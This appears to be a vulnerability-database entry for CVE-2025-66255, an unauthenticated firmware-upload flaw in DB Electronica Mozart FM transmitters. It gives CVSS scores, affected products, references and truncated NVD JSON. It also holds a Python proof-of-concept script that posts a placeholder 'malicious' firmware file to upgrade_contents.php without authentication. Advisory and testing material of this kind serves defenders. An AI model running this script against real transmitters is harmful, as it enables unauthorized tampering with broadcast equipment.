CVE-2025-66255

Description

Unauthenticated Arbitrary File Upload (upgrade_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Missing signature validation allows uploading malicious firmware packages. The firmware upgrade endpoint in `upgrade_contents.php` accepts arbitrary file uploads without validating file headers, cryptographic signatures, or enforcing .tgz format requirements, allowing malicious firmware injection. This endpoint also subsequently provides ways for arbitrary file uploads and subsequent remote code execution

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:mozart_next_3000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_3000:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_3500_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_3500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_50_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_50:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_500_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_6000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_6000:-:*:*:*:*:*:*:* - NOT VULNERABLE

Mozart FM Transmitter 30

Mozart FM Transmitter 50

Mozart FM Transmitter 100

Mozart FM Transmitter 300

Mozart FM Transmitter 500

Mozart FM Transmitter 1000

Mozart FM Transmitter 2000

Mozart FM Transmitter 3000

Mozart FM Transmitter 3500

Mozart FM Transmitter 6000

Mozart FM Transmitter 7000

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-66255 PoC
DB Electronica Mozart FM Transmitter - Unauthenticated Arbitrary File Upload
"""

import requests
import sys
import os

def create_malicious_firmware():
    """Create a malicious firmware package"""
    # Create a simple .tgz file with malicious content
    # In real attack, this would contain actual malicious firmware
    malicious_content = b'MALICIOUS_FIRMWARE_PAYLOAD_' + b'A' * 100
    return malicious_content

def exploit_cve_2025_66255(target_url, output_file=None):
    """
    Exploit for CVE-2025-66255: Unauthenticated Arbitrary File Upload
    
    Args:
        target_url: Base URL of the Mozart FM Transmitter web interface
        output_file: Optional file to save the response
    """
    
    # Endpoint for firmware upgrade
    upload_endpoint = f"{target_url.rstrip('/')}/upgrade_contents.php"
    
    # Create malicious firmware
    firmware_data = create_malicious_firmware()
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Upload endpoint: {upload_endpoint}")
    print(f"[*] Creating malicious firmware payload ({len(firmware_data)} bytes)")
    
    try:
        # Send malicious file upload request (no authentication required)
        files = {
            'firmware': ('malicious.tgz', firmware_data, 'application/octet-stream')
        }
        
        print("[*] Sending malicious firmware upload request...")
        response = requests.post(upload_endpoint, files=files, timeout=30)
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)} bytes")
        
        if output_file:
            with open(output_file, 'w') as f:
                f.write(response.text)
            print(f"[*] Response saved to: {output_file}")
        
        # Check for indicators of successful exploitation
        if response.status_code == 200:
            if 'success' in response.text.lower() or 'uploaded' in response.text.lower():
                print("[+] VULNERABLE! File upload appears successful")
                print("[+] Attacker can now deploy malicious firmware for RCE")
                return True
        
        print("[-] Upload may not have succeeded - manual verification needed")
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-66255_poc.py <target_url> [output_file]")
        print("Example: python cve-2025-66255_poc.py http://192.168.1.100")
        sys.exit(1)
    
    target = sys.argv[1]
    output = sys.argv[2] if len(sys.argv) > 2 else None
    
    exploit_cve_2025_66255(target, output)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66255
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66255
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66255/
[4] VulDB https://vuldb.com/cve/CVE-2025-66255
[5] https://www.abdulmhsblog.com/posts/webfmvulns/
[6] https://www.abdulmhsblog.com/posts/webfmvulns/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66255", "sourceIdentifier": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "published": "2025-11-26T01:16:08.710", "lastModified": "2025-12-03T16:48:27.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated Arbitrary File Upload (upgrade_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Missing signature validation allows uploading malicious firmware packages. \nThe firmware upgrade endpoint in `upgrade_contents.php` accepts arbitrary file uploads without validating file headers, cryptographic signatures, or enforcing .tgz format requirements, allowing malicious firmware injection. This endpoint also subsequently provides ways for arbitrary file uploads and subsequent remote code execution"}], "metrics": {"cvssMetricV40": [{"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9F5D088-18AE-4388-83D7-66EBF03B3091"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "E5427DF7-CBAB-4BB9-9175-B7EC7012EAD0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "285B4AB4-1F69-445E-B2D3-A0C140B55990"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3500:-:*:*:*:*:*:*:*", "matchCriteriaId": "90E84970-55F7-41CB-814E-085BACFAAA91"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_50_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "9CD961FB-E86A-4346-9B8D-3658C7BD818F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_50:-:*:*:*:*:*:*:*", "matchCriteriaId": "56699CC2-C823-4397-8C76-BC165E48D6E0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "93081491-7BD5-4AD8-B9A9-4017BD531955"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_500:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2D2A2EE-4D89-40F7-82CF-15B01BCCA5D7"}]}]}, {"operat ... (truncated)